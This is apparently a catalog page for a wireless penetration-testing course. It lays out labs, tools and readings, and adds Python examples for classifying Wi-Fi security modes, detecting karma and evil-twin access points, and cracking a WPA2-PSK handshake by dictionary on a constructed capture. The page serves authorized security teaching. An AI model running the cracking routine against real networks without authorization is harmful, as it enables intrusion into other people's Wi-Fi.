
VCA-WIR-101: Wireless Penetration Testing

Wireless is everywhere and it is mostly invisible. A building's attack surface includes every frame in the air around it: Wi-Fi, Bluetooth, Zigbee, LoRa, sub-GHz ISM, cellular, and the quieter protocols riding on top. The course is explicitly not "how to crack your neighbor's Wi-Fi." It is how a licensed wireless pen tester, invited onto a client's premises, characterizes and tests the wireless security posture of that client's environment.

Total time: ~106 hours
Lecture: ~10 hr
Practical / lab: ~55 hr
Independent practice: ~41 hr
Position: After NET-101 + SEC-101 + FND-102
Prereq: NET-101 + SEC-101 + FND-102
Equipment: USB Wi-Fi adapter (Alfa AWUS036ACH-style, monitor-mode capable; ~$50); RTL-SDR Blog V4 (~$40; entry SDR; receive-only); HackRF One (program-supplied for Lab 9 transmit work); nRF52840 dongle (~$15) for BLE; ANT-SDR E200 advanced platform (program-supplied). Primary DSP/SDR tooling is delivered in-browser via the academy workbench (PySDR-style DSP in Python with NumPy / scipy.signal / matplotlib, all running in the browser; LIVE). An in-browser GNU Radio subset is in engineering. (See the hardware platform page; we update this as the kit firms up.)
Credential: VCA-WIR-101 Certificate of Completion
Register interest. We're not taking enrollments yet. Email interested@virtuscyberacademy.org.

Course Overview

The course focuses primarily on 802.11 (Wi-Fi) because that is where most authorized wireless-security work happens in small-business and enterprise engagements, but it introduces Bluetooth/BLE and sub-GHz surfaces well enough that graduates can investigate a novel wireless protocol when they encounter one.

Position relative to peer curricula. WIR-101 sits between OffSec OSWP (PEN-210) and SANS GAWN. OSWP's syllabus skews historical (WEP-era content disproportionate to its modern field relevance); GAWN is comprehensive but vendor-tied. WIR-101 weights modern WPA/WPA2/WPA3 + enterprise (802.1X) the way the field actually weights them, adds Bluetooth/BLE + sub-GHz surfaces neither cert covers in depth, and grades on a client-style wireless engagement report. The course's site-survey methodology + RF-coverage-map deliverable also exceed both certs' scope.

Pipeline role: WIR-101 is the wireless specialty alongside PEN-101 in the Pentest Track. Students arrive with networking (NET-101) + security principles (SEC-101) + Python tooling (FND-102) and leave able to scope, conduct, and report an authorized wireless engagement, with the engagement discipline cohorted alongside (or after) PEN-101's IP-network engagement methodology.

What Belt-3 RF/Wireless Track Graduates Recognize

WIR-101 reads paired anchors at intermediate depth: Lyons's Understanding Digital Signal Processing (3rd ed.) plus Wyglinski et al.'s SDR for Engineers (free PDF via Analog Devices) supply the narrative side (the math from the sample upward; the radio chain from the antenna inward), and Marc Lichtman's PySDR plus the GNU Radio Tutorials supply the build-it-yourself side (every DSP chapter runnable in the academy workbench with no local install). ARRL Technician/General/Extra study materials offer a parallel credential pathway. Graduates leave able to discuss the sampling theorem and aliasing as structural properties, the analogue-to-digital boundary moving toward the antenna across radio generations, the authentication-and-key-agreement progression (WEP through WPA2-PSK and WPA3-SAE on the Wi-Fi side, and cellular AKA through 5G-AKA) together with the attack classes that drove each redesign (KRACK against the WPA2 four-way handshake, Dragonblood against WPA3-SAE, IMSI-catchers against pre-5G subscriber-identity exposure, FragAttacks against 802.11 fragmentation and aggregation), and the named tool families (RTL-SDR, HackRF, GNU Radio, GQRX, Wireshark wireless dissectors).

The teaching method uses paired textbook readings on canonical practitioner texts, with the per-chapter reading guide published as a separate handout (handouts/cross-chapter-wir-101-anchor-reading-guide.md) so the catalog page stays thin. Ten hands-on labs (Week 6 is the proctored midterm) anchor each module to a measurable artifact (rubber-ducky antenna characterization, WPA2 handshake capture and crack, sub-GHz protocol classification, BLE GATT enumeration), and the capstone is a five-day simulated wireless engagement against an academy-owned RF testbed. Graduates carry the spectrum-folding mental model, the build-it-yourself PySDR fluency, and the protocol-design-as-historical-progression frame into RF-201 / RF-301 advanced SDR work, into PEN-101's wireless-pentest module, into RE-101's embedded-radio teardowns, and into the OffSec OSWP / SANS GAWN credentials they typically sit within months of WIR-101 completion.

Learning Objectives

Objectives build step-by-step; each is measurable against a specific lab or deliverable.

  1. Remember. State the four major 802.11 frame types (management / control / data / extension), the WPA/WPA2 four-way-handshake message numbers, the FCC unlicensed-spectrum rules for 2.4 GHz / 5 GHz / sub-GHz ISM, and the difference between SDR receive-only and licensed-transmit operation. (Assessed: midterm closed-book quiz.)
  2. Understand. Explain why monitor mode is a hardware-and-driver capability not all NICs support, why antenna gain has direction and polarization, why WPA3-SAE was designed to defeat the offline-cracking attack class, and why open guest networks remain a legitimate engagement finding. (Assessed: D2 reflection; site-survey lab.)
  3. Apply. Operate an RF-capable workstation. Wireless NIC in monitor mode, antenna selection by use case, regulatory-compliant transmit operation. (Assessed: Lab 1 + Lab 3.)
  4. Apply. Passively observe 802.11 networks; capture management frames, associations, probe requests, handshakes; interpret with Wireshark's 802.11 dissectors. (Assessed: Lab 2 + Lab 3 site survey.)
  5. Apply. Identify security posture (open / WEP / WPA-PSK / WPA2-PSK / WPA3-SAE / Enterprise 802.1X) of observed networks; conduct authorized WPA/WPA2 handshake captures + offline password-cracking with aircrack-ng + hashcat + dictionary engineering. (Assessed: Lab 4 + Lab 5.)
  6. Apply. Identify + test rogue-AP and evil-twin detection mechanisms; build a karma-attack detector. (Assessed: Lab 7 hardware demo.)
  7. Apply. Survey Bluetooth + BLE behavior (advertising, GATT, pairing modes) with btmon, gatttool, and an nRF52-class radio; survey sub-GHz (315/433/868/915 MHz) with RTL-SDR + HackRF; classify protocols by waveform family. (Assessed: Lab 8 + Lab 9.)
  8. Synthesize / Create. Produce a client-style wireless engagement report. Site map, network inventory, per-network + Bluetooth + sub-GHz findings, remediation; deliver an executive briefing in client-technical-lead context. (Assessed: Capstone, 5-day simulated wireless engagement.)
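
A worked example of the security-posture classification behind Objective 5 and Lab 4, added here as an illustration and not part of the course materials: it reads the Capability Information field and the RSN / legacy-WPA information elements of a beacon or probe-response frame body and returns the mode in the taxonomy above, plus the caveats a report should carry (management-frame protection status, TKIP still enabled, WPA2/WPA3 transition mode). The sample frame bodies, SSIDs and suite choices are constructed inline, not captures; the IE layouts and suite selectors (OUI 00-0F-AC for RSN, OUI 00-50-F2 type 1 for the legacy WPA vendor IE) follow IEEE 802.11-2020. A real capture is fed in by stripping the 24-byte MAC header from each beacon; that capture step is left to Kismet or scapy and not shown.

```python
"""Classify 802.11 security posture from a beacon / probe-response frame body.
Added example with constructed frames; IE layouts follow IEEE 802.11-2020.
Frame body = timestamp(8) + beacon interval(2) + capability(2) + tagged IEs."""
import struct

IE_SSID, IE_RSN, IE_VENDOR = 0x00, 0x30, 0xDD
OUI_IEEE, OUI_MSFT = b"\x00\x0f\xac", b"\x00\x50\xf2"   # RSN selectors; legacy WPA vendor IE
CAP_PRIVACY, MFPR, MFPC = 0x0010, 0x0040, 0x0080         # capability bit 4; RSN-caps bits 6, 7
AKM = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK", 5: "802.1X-SHA256",
       6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE", 12: "802.1X-SuiteB-192", 18: "OWE"}

def parse_ies(buf):
    """Yield (tag, value) per IE; stop at a truncated IE rather than guess."""
    i = 0
    while i + 2 <= len(buf) and i + 2 + buf[i + 1] <= len(buf):
        yield buf[i], buf[i + 2:i + 2 + buf[i + 1]]
        i += 2 + buf[i + 1]

def parse_suites(body, oui):
    """(group, pairwise list, AKM list, capabilities) from a suite-selector block, or None."""
    def sel(off):
        s = body[off:off + 4]
        return s[3] if len(s) == 4 and s[:3] == oui else None
    try:
        n_pw = struct.unpack_from("<H", body, 4)[0]
        off = 6 + 4 * n_pw
        n_akm = struct.unpack_from("<H", body, off)[0]
        akms = [sel(off + 2 + 4 * k) for k in range(n_akm)]
        off += 2 + 4 * n_akm
        caps = struct.unpack_from("<H", body, off)[0] if off + 2 <= len(body) else 0
    except struct.error:
        return None
    return sel(0), [sel(6 + 4 * k) for k in range(n_pw)], akms, caps

def classify_beacon(frame_body):
    """Map one frame body to the course taxonomy plus the caveats a report needs."""
    res = {"mode": "Unknown", "ssid": "", "akms": [], "mfp": "none", "weak": []}
    if len(frame_body) < 12:
        return res
    cap, rsn, wpa = struct.unpack_from("<H", frame_body, 10)[0], None, None
    for tag, val in parse_ies(frame_body[12:]):
        if tag == IE_SSID:
            res["ssid"] = val.decode("utf-8", "replace")
        elif tag == IE_RSN:
            rsn = val
        elif tag == IE_VENDOR and val[:4] == OUI_MSFT + b"\x01":
            wpa = val[4:]
    if rsn is not None:                                  # RSN IE = version(2) + suite lists
        parsed = parse_suites(rsn[2:], OUI_IEEE)
        if parsed is None:
            return dict(res, weak=["malformed RSN IE"])
        group, pairwise, akms, caps = parsed
        res["akms"] = [AKM.get(a, f"akm-{a}") for a in akms]
        res["mfp"] = "required" if caps & MFPR else "optional" if caps & MFPC else "none"
        sae, psk, dot1x = {8, 9} & set(akms), {2, 4, 6} & set(akms), {1, 3, 5} & set(akms)
        rules = [(sae and psk, "WPA3-transition (WPA2-PSK + SAE)"), (sae, "WPA3-SAE"),
                 (18 in akms, "OWE (enhanced open)"), (12 in akms, "WPA3-Enterprise-192"),
                 (dot1x, "WPA2-Enterprise (802.1X)"), (psk, "WPA2-PSK")]
        res["mode"] = next((name for hit, name in rules if hit), "RSN (unrecognized AKM)")
        if sae and psk:
            res["weak"].append("transition mode: the PSK path is still offline-crackable")
        if 2 in pairwise or group == 2:                  # suite type 2 = TKIP
            res["weak"].append("TKIP still enabled")
    elif wpa is not None:                                # legacy WPA IE = version(2) + suite lists
        parsed = parse_suites(wpa[2:], OUI_MSFT)
        res["mode"] = "WPA-PSK" if parsed and 2 in parsed[2] else "WPA-Enterprise (802.1X)"
        res["weak"].append("WPA1 (TKIP era) should be retired")
    elif cap & CAP_PRIVACY:                              # Privacy bit with no RSN/WPA IE
        res["mode"], res["weak"] = "WEP", ["WEP is broken; treat as open"]
    else:
        res["mode"] = "Open"
    return res

# Constructed sample beacons (hypothetical SSIDs, not captures).
def _beacon(ssid, cap, ies=b""):
    return struct.pack("<QHH", 0, 100, cap) + bytes([IE_SSID, len(ssid)]) + ssid.encode() + ies
def _suites(oui, group, pairwise, akms):
    return (oui + bytes([group]) + struct.pack("<H", len(pairwise))
            + b"".join(oui + bytes([c]) for c in pairwise)
            + struct.pack("<H", len(akms)) + b"".join(oui + bytes([a]) for a in akms))
def _rsn(pairwise, akms, caps=0, group=4):
    body = struct.pack("<H", 1) + _suites(OUI_IEEE, group, pairwise, akms) + struct.pack("<H", caps)
    return bytes([IE_RSN, len(body)]) + body
def _wpa(pairwise, akms, group=2):
    body = OUI_MSFT + b"\x01" + struct.pack("<H", 1) + _suites(OUI_MSFT, group, pairwise, akms)
    return bytes([IE_VENDOR, len(body)]) + body

SAMPLES = {                          # 0x0431 = ESS + Privacy + short preamble + short slot
    "open-guest": _beacon("Guest", 0x0421),
    "wep-legacy": _beacon("Warehouse", 0x0431),
    "wpa1-psk": _beacon("OldAP", 0x0431, _wpa([2], [2])),
    "wpa2-psk": _beacon("IoT-Net", 0x0431, _rsn([4], [2])),
    "wpa2-ent": _beacon("Corp", 0x0431, _rsn([4], [1], caps=MFPC)),
    "wpa3-sae": _beacon("Corp-WPA3", 0x0431, _rsn([4], [8], caps=MFPC | MFPR)),
    "transition": _beacon("Corp-Mixed", 0x0431, _rsn([4], [2, 8], caps=MFPC)),
}

def survey(samples=SAMPLES):
    """Classify every sample: the Lab 4 deliverable in miniature."""
    return {name: classify_beacon(body) for name, body in samples.items()}
```

The classifier deliberately refuses to guess on truncated or malformed IEs and reports them as Unknown rather than defaulting to Open, because a mis-tagged network is the exact error the capstone rubric penalizes.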

Week-by-Week Topic Flow

Week | Topic | Lab anchor
1 | RF fundamentals: frequency, modulation, antennas, regulatory (FCC Part 15, 97, 95) | Lab 1: Build a rubber-ducky antenna; characterize it with an SDR
2 | 802.11 architecture: frame types, addressing, management plane | Lab 2: Capture + annotate a full 802.11 association sequence
3 | Wireless reconnaissance: site survey, Kismet, Wireshark 802.11 dissectors | Lab 3: Full site survey of a Virtus lab space
4 | 802.11 security protocols: WEP, WPA-PSK, WPA2, WPA3-SAE, 802.1X | Lab 4: Identify the security mode of every network observed in Lab 3
5 | WPA/WPA2 handshake capture + offline cracking: preconditions, hashcat, wordlist engineering | Lab 5: Crack an instructor-provided handshake
6 | Midterm practical: scoped wireless assessment of a lab network | Proctored exam
7 | Rogue APs, evil twins, karma attacks: detection and test methodology | Lab 7: Build a karma detector; test it against an instructor-run rogue AP
8 | Bluetooth and BLE: pairing modes, services, GATT, advertising | Lab 8: Enumerate + characterize lab BLE devices
9 | Sub-GHz surveys: RTL-SDR receive, HackRF TX, protocol recognition | Lab 9: Capture, classify, and document 3 sub-GHz protocols
10 | Engagement topics: RF coverage maps, interference testing, spectrum hygiene | Lab 10: Client-style RF survey with mapped results
11 | Report writing + client communication | Lab 11: Finalize + present the engagement report
12-13 | Capstone: 5-day simulated wireless engagement | Capstone report + 15-min executive briefing
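
For Week 5 and Lab 5, the arithmetic that aircrack-ng and hashcat mode 22000 actually perform, written out as an added example (not course material or either tool's code): PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes); PTK = PRF-512 over the PMK, the two MAC addresses and the two nonces; KCK = PTK[0:16]; and the EAPOL-Key MIC of handshake message 2 recomputed with HMAC-SHA1 for each candidate passphrase until one matches. The SSID, MACs, nonces, passphrase and wordlist are constructed inline, and the "captured" message 2 is forged from the known passphrase so the scenario is self-consistent; on a real engagement ANonce comes from message 1 and SNonce plus the MIC'd EAPOL frame from message 2 of the capture. Only key descriptor version 2 (WPA2-PSK with CCMP) is implemented. The same code shows why Objective 2's claim about WPA3-SAE holds: with SAE the PMK is the output of a Dragonfly exchange, so a captured transcript gives nothing to test candidate passphrases against offline.

```python
"""WPA2-PSK four-way-handshake arithmetic and an offline dictionary check.
Added example with a constructed handshake; derivations per IEEE 802.11 (12.7).
Handles key descriptor version 2 only (HMAC-SHA1 MIC: AKM 2 with CCMP, the
common WPA2-PSK case); version 1 (TKIP, HMAC-MD5) and 3 (SHA-256 AKMs,
AES-128-CMAC) use different MIC functions."""
import hashlib
import hmac
import struct

# 802.1X hdr(4) + descriptor type(1) + key info(2) + key length(2) + replay(8)
# + nonce(32) + IV(16) + RSC(8) + key ID(8) = 81: the 16-byte MIC starts here.
MIC_OFF = 81


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PRF-512: concat HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || B || i), i = 0..3.
    B orders the MACs and nonces numerically, so either side derives the same PTK."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]          # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck, eapol):
    """MIC = HMAC-SHA1(KCK, EAPOL-Key frame with its MIC field zeroed)[:16]."""
    zeroed = eapol[:MIC_OFF] + b"\x00" * 16 + eapol[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(kck, snonce, replay=1, key_data=b""):
    """EAPOL-Key message 2 as a station sends it: key info 0x010A = version 2 | pairwise | MIC."""
    body = (bytes([2]) + struct.pack(">HHQ", 0x010A, 0, replay) + snonce   # RSN descriptor
            + b"\x00" * 32 + b"\x00" * 16                                    # IV, RSC, key ID; MIC placeholder
            + struct.pack(">H", len(key_data)) + key_data)
    frame = bytes([1, 3]) + struct.pack(">H", len(body)) + body              # 802.1X v1, type EAPOL-Key
    return frame[:MIC_OFF] + eapol_mic(kck, frame) + frame[MIC_OFF + 16:]


def crack(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Return the first candidate whose KCK reproduces the captured MIC, else None.
    This loop is what aircrack-ng / hashcat 22000 run; PBKDF2 dominates the cost."""
    target = msg2[MIC_OFF:MIC_OFF + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), target):
            return candidate
    return None


# Constructed scenario: hypothetical SSID, MACs, nonces, passphrase and wordlist.
SSID, PASSPHRASE = "VirtusLab-Guest", "correct-horse-battery"
AP_MAC, STA_MAC = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
ANONCE, SNONCE = hashlib.sha256(b"anonce").digest(), hashlib.sha256(b"snonce").digest()
WORDLIST = ["password", "virtuslab2024", "Welcome1!", "correct-horse-battery", "letmein"]


def demo():
    """Forge the 'captured' message 2 from the real passphrase, then recover it by dictionary."""
    kck = ptk_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, build_msg2(kck, SNONCE), WORDLIST)
```

Two practitioner points fall out of the code: the MIC binds the SSID, both MACs and both nonces, so a capture missing any of them (or with a message 2 that belongs to a different ANonce) cannot be verified at all, which is the "preconditions" half of Week 5; and every candidate costs a full PBKDF2 run, which is why wordlist engineering matters more than raw hash rate.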

Lab Manifest

Ten graded labs (numbered 1-5 and 7-11; Week 6 is the proctored midterm) plus the capstone wireless engagement. Every lab produces an artifact + transcript committed to a private course Git repository.

Lab | Title | Deliverable artifact
1 | RF Fundamentals + Antenna Build | Hand-built rubber-ducky antenna; SDR-captured radiation pattern
2 | 802.11 Association Sequence | Annotated PCAP of a full association (probe / auth / assoc / 4-way handshake)
3 | Site Survey | Heatmap + network inventory (SSID / channel / BSSID / vendor / signal) of the lab space
4 | Security-Posture Identification | Per-network security-mode classification (open / WEP / WPA-PSK / WPA2-PSK / WPA3 / 802.1X)
5 | WPA/WPA2 Handshake Cracking | Cracked-handshake transcript; wordlist + hashcat command archive
7 | Karma / Evil-Twin Detection | Working karma detector; transcript of the detected rogue AP
8 | Bluetooth / BLE Enumeration | GATT-server enumeration of 3+ lab BLE devices; advertising-frame analysis
9 | Sub-GHz Protocol Recognition | 3 captured + classified protocols (e.g., 433 MHz garage-door, 868 MHz LoRa, 915 MHz IoT)
10 | RF Coverage Survey | Mapped coverage report; interference findings; spectrum-hygiene recommendations
11 | Report Workshop | Engagement-report draft; instructor + peer review
C | Capstone | 5-day wireless engagement report (site map + network inventory + per-network findings + Bluetooth findings + sub-GHz findings + remediation) + 15-min executive briefing
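
Lab 7's detector reduced to its decision logic, as an added example rather than the lab's own solution: the tester sends directed probe requests for random canary SSIDs that no AP on site should know, and any BSSID that answers several of them is behaving as a karma-style AP; separately, any BSSID advertising one of the client's SSIDs while not on the authorized list, or at a weaker security mode than the client's baseline, is an evil-twin candidate. The event log is constructed to look like what a monitor-mode capture would yield after the probes; the baseline, BSSIDs and SSIDs are hypothetical, and the frame capture itself (Kismet or scapy) is not shown.

```python
"""Karma and evil-twin detection over a probe-response / beacon event log.
Added example; the events, BSSIDs, SSIDs and client baseline are constructed."""
import secrets
from collections import defaultdict

# Course security-mode taxonomy, ranked weakest to strongest for downgrade checks.
RANK = {"Open": 0, "WEP": 1, "WPA-PSK": 2, "WPA2-PSK": 3, "WPA2-Enterprise": 4, "WPA3-SAE": 5}


def make_canaries(n=3):
    """Random SSIDs that nothing on site should ever answer a directed probe for."""
    return [f"vca-canary-{secrets.token_hex(4)}" for _ in range(n)]


def locally_administered(bssid):
    """First-octet bit 1 set: not a vendor-assigned MAC. A hint (rogue tooling often
    randomizes its BSSID), never proof on its own."""
    return bool(int(bssid.split(":")[0], 16) & 0x02)


def detect(events, canaries, baseline, authorized, min_canary_hits=2):
    """events: (kind, bssid, ssid, security) tuples, kind in {"probe_resp", "beacon"}.
    baseline: {ssid: security mode} for the client's networks.
    authorized: {ssid: set(bssid)} that may legitimately advertise each SSID.
    Returns a list of finding dicts (kind, bssid, ssid, reasons)."""
    canary_hits = defaultdict(set)    # bssid -> canary SSIDs it answered
    twins = {}                        # (bssid, ssid) -> reasons; beacons repeat, so de-dupe
    for kind, bssid, ssid, security in events:
        if kind == "probe_resp" and ssid in canaries:
            canary_hits[bssid].add(ssid)
        elif ssid in baseline and bssid not in authorized.get(ssid, set()):
            reasons = ["BSSID not on the authorized list"]
            if RANK.get(security, -1) < RANK[baseline[ssid]]:
                reasons.append(f"security downgrade {baseline[ssid]} -> {security}")
            twins[(bssid, ssid)] = reasons
    findings = [{"kind": "evil-twin", "bssid": b, "ssid": s, "reasons": r}
                for (b, s), r in twins.items()]
    for bssid, hits in canary_hits.items():
        if len(hits) >= min_canary_hits:     # one hit can be noise; answering several is the signature
            findings.append({"kind": "karma", "bssid": bssid, "ssid": None,
                             "reasons": [f"answered {len(hits)} of {len(canaries)} canary probes"]})
    for f in findings:
        if locally_administered(f["bssid"]):
            f["reasons"].append("locally administered BSSID")
    return findings


# Constructed scenario: fixed canaries (use make_canaries() live), hypothetical site.
CANARIES = ["vca-canary-1b2f9c03", "vca-canary-77e0a1d4", "vca-canary-c05d3e88"]
BASELINE = {"VirtusCorp": "WPA2-Enterprise", "VirtusGuest": "Open"}
AUTHORIZED = {"VirtusCorp": {"10:34:56:00:00:01", "10:34:56:00:00:02"},
              "VirtusGuest": {"10:34:56:00:00:01"}}
EVENTS = [
    ("beacon", "10:34:56:00:00:01", "VirtusCorp", "WPA2-Enterprise"),
    ("beacon", "10:34:56:00:00:01", "VirtusGuest", "Open"),
    ("probe_resp", "10:34:56:00:00:02", "VirtusCorp", "WPA2-Enterprise"),   # legit AP answers only its SSID
    ("probe_resp", "02:c0:ff:ee:00:01", "vca-canary-1b2f9c03", "Open"),     # rogue answers every canary
    ("probe_resp", "02:c0:ff:ee:00:01", "vca-canary-77e0a1d4", "Open"),
    ("probe_resp", "02:c0:ff:ee:00:01", "vca-canary-c05d3e88", "Open"),
    ("beacon", "02:c0:ff:ee:00:01", "VirtusCorp", "Open"),                  # same rogue: open twin of the corp SSID
    ("beacon", "02:c0:ff:ee:00:01", "VirtusCorp", "Open"),                  # repeated beacon, must not double-count
    ("probe_resp", "10:34:56:00:00:09", "vca-canary-1b2f9c03", "Open"),     # single stray hit, below threshold
]


def run_demo():
    """Run the detector over the constructed log: expect one karma and one evil-twin finding."""
    return detect(EVENTS, CANARIES, BASELINE, AUTHORIZED)
```

The canary threshold is the part worth tuning on site: a single answered canary can be a parse error or a captive-portal AP with a wildcard policy, while answering several distinct random SSIDs is the karma signature. Keep the evidence (the probe request you sent and the response you got, with timestamps) in the transcript the lab asks for.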

Bridge to Downstream Courses

WIR-101 is a Pentest-Track specialty. Cross-course threads:

  • → PEN-101 (Intro to Pentest). Same engagement-lifecycle scaffold + report format; WIR-101's capstone uses the same client-grade report shape, retargeted to RF surface.
  • → ADV-101 (Adversarial Techniques). The captured-handshake + cracked-credential + karma-detector workflows are the substrate ADV-101's wireless-CVE labs build on (when ADV-101 covers a wireless CVE).
  • → RE-101 (RE of Embedded Systems). The sub-GHz protocol-recognition skill from Lab 9 is what RE-101 students need to characterize a captured firmware-emission stream; the BLE / GATT enumeration discipline transfers directly to RE work on Bluetooth-attached embedded targets.
  • → RE-201 (RE of Burst Radio Signals). WIR-101 is the prereq foundation; RE-201 deepens the SDR + waveform-classification work into adversarial RF reverse-engineering.
  • → RF-201 (Intermediate RF: Layer-1 + Layer-2 Protocols + RE Workflows). NEW Part-II elective. Picks up WIR-101's 802.11 + BLE + sub-GHz foundation and goes intermediate-deep on modulation theory, frequency hopping / spread spectrum, LoRa + ZigBee + 802.15.4, IQ-sampling theory, Wireshark RF, and HackRF / bladeRF / ANT-SDR E200 / LimeSDR Mini lab progression. Connects to the RE-track, PT-track, and the SB6141 cable-modem RF stage.
  • → RF-301 (Advanced SDR + Waveform RE). NEW Part-II elective. Carrier-grade DSP + cognitive radio + cellular (LTE / 5G NR via OpenAirInterface) + SATCOM + SIGINT + RF waveform RE + anti-jamming / LPI/LPD. The terminal RF-track course.
  • → NET-201 + EMB-201 (the SB6141 cable-modem pipeline). WIR-101's sub-GHz + DSP foundation feeds into the embedded-networking lab-target pipeline; NET-201 covers the protocol-stack side, EMB-201 covers the firmware-on-radio side. A student who reaches RE-101 having taken WIR-101 + NET-201 + EMB-201 reads the cable modem's DOCSIS RF stage as a witness to its architecture, not as mysterious bytes.
  • → OffSec OSWP / SANS GAWN. Course exceeds both syllabi; students typically sit OSWP within 2-3 months of WIR-101 completion.

Tool Journal: WIR-101 / RF-Track Originating Entries

Per the academy's first-introduce-track-ownership rule, WIR-101 is the canonical originating course for the RF-track tool corpus. Subsequent courses (RF-201, RF-301, RE-201) reference rather than re-introduce these entries; PEN-101's wireless-pentest cross-cuts (aircrack-ng, Hashcat 802.11 modes) inherit the WIR-101 introductions. Tools introduced in WIR-101, with one paragraph each in toolchain-diary.md:

  • PySDR (in workbench Tab 1; Pyodide LIVE), the academy's default RF-track delivery; runs Marc Lichtman's PySDR DSP-and-SDR exercises in the browser without local install. Anchored at pysdr.org.
  • Python + NumPy + scipy.signal + matplotlib (the DSP-in-Python signal stack). Canonical first-introduce here per cross-track-toolchain-roster; RF-track owns these in their DSP-application form.
  • GNU Radio Companion (GRC) + grcc. Canonical SDR-flowgraph IDE; first met Week 9. Pyodide-subset (TIR-4) in engineering for in-browser delivery; full GRC remains an external-install advanced track.
  • GQRX (Linux/macOS SDR receiver). Canonical first-introduce here; RF-201 and RF-301 reference.
  • SDR# / SDR++ (Windows / cross-platform SDR receivers). Canonical first-introduce here.
  • RTL-SDR Blog V4 + Osmocom rtl-sdr (librtlsdr). Receive-only software-defined radio; sub-GHz survey workhorse; canonical first-introduce of the RTL-SDR community for the academy. Caveat: the V4's R828D tuner needs the RTL-SDR Blog fork of the driver; an unpatched stock osmocom build enumerates the dongle but does not tune it correctly.
  • HackRF One + hackrf_transfer + Ossmann GRC blocks. Transmit-capable SDR; program-supplied for Lab 9 RF-shielded transmit operation; anchored on Ossmann's "Software Defined Radio with HackRF" YouTube series (FREE).
  • ANT-SDR E200, the canonical academy lab platform for advanced SDR work; carries forward into RF-201 and RF-301 as the academy primary.
  • Inspectrum (offline RF visual analysis). Canonical for protocol RE; introduced Week 9, deepened in RF-201/RF-301.
  • Universal Radio Hacker (URH). Canonical wireless-protocol RE suite; native HackRF + bladeRF + LimeSDR + RTL-SDR support; URH-NG fork by PentHertz adds 327-protocol auto-identification + automotive RF crypto toolkit. Introduced Week 9; central in RF-201/RF-301.
  • Alfa AWUS036ACH USB Wi-Fi NIC, the practitioner-staple monitor-mode-capable NIC (Realtek RTL8812AU; monitor mode and injection come from the out-of-tree aircrack-ng rtl8812au driver, not the stock kernel driver, so driver installation is part of Lab 1 setup).
  • aircrack-ng suite (airodump-ng / airmon-ng / aireplay-ng / aircrack-ng), 802.11 capture, deauth injection, offline cracking. Cross-cut to PT-track ADV-101.
  • Kismet. Passive 802.11 wireless detector + sniffer + intrusion-detection system; the site-survey staple.
  • Wireshark with 802.11 / RF dissectors. Frame-level analysis; the diary entry for Wireshark exists from NET-101 (canonical introduction) but is extended here for 802.11-specific + RF-protocol dissection.
  • nRF52840 dongle + btmon + gatttool, Bluetooth + BLE investigation toolset; canonical first-introduce of BLE tooling here. Caveat: gatttool is deprecated in BlueZ 5 and is not built unless BlueZ is configured with --enable-deprecated; bluetoothctl covers the same GATT enumeration on current distributions.
  • Hashcat with WPA/WPA2 modes, PMK / PMKID / handshake offline cracking; PEN-101's hashcat entry (canonical introduction) is extended here for 802.11-specific use.
  • ARRL Technician license study materials, FCC Part 97 amateur-radio licensing; the parallel credential pathway. The closest RF-side analogue to PEN-101's OSCP and NET-101's CCNA preparation patterns; ~700K+ US licensees.

Recommended Readings & Practitioner Companions

Primary anchor pair (down-to-earth narrative)

  • Richard Lyons, Understanding Digital Signal Processing, 3rd ed. Pearson, 2010 (ISBN 978-0-13-702741-5). The DSP pedagogy canon; IEEE SPS 2012 Educator of the Year. Library-acquire or paperback ~$80-100. WIR-101 reads Ch 1-5 (intro / signals / sampling / DFT / IIR & FIR filters); RF-201 + RF-301 extend.
  • Wyglinski, Getz, Collins, Pu, Software-Defined Radio for Engineers. Artech House, 2018 (ISBN 978-1-63081-457-1). FREE PDF via Analog Devices perpetual eBook license: analog.com/.../SDR4Engineers.pdf. Covers RF front-ends + ADCs/DACs + IQ + GNU Radio + ADALM-PLUTO labs.

Primary anchor pair (build-it-yourself; free)

  • Marc Lichtman, PySDR: A Guide to SDR and DSP using Python. FREE online at pysdr.org. The one-stop comprehensive entry for software-defined-radio + DSP + Python tooling; cited in GNU Radio's official SuggestedReading.
  • GNU Radio Tutorials + GRC flowgraph corpus. First-party docs at wiki.gnuradio.org/Tutorials. Free + open-source (GPL); the canonical SDR-software-radio platform since 2006.

Secondary anchors (supplementary; free)

  • Steven W. Smith, The Scientist and Engineer's Guide to Digital Signal Processing. Entirely FREE online at dspguide.com. 1997; fundamentals don't age.
  • Michael Ossmann, "Software Defined Radio with HackRF" video series, FREE on YouTube via greatscottgadgets.com/sdr. The HackRF practitioner narrative.
  • Bernard Sklar, Digital Communications: Fundamentals and Applications, 3rd ed. Pearson, 2017. For students wanting modulation-and-coding depth; RF-201/RF-301 supplementary.

Practitioner training (parallel credential pathway)

  • ARRL Technician / General / Extra licensing. arrl.org/getting-licensed. FCC Part 97 amateur-radio licensing; ~700K+ US licensees. The closest RF parallel to PEN-101's OSCP and NET-101's CCNA. WIR-101 students are positioned to sit Technician within a month of completion.

Prerequisite Map

Depends on: NET-101 (packet + protocol literacy is the substrate WIR-101 retargets to RF) + SEC-101 (security principles) + FND-102 (Python tooling fluency for log + capture analysis).

Feeds into:

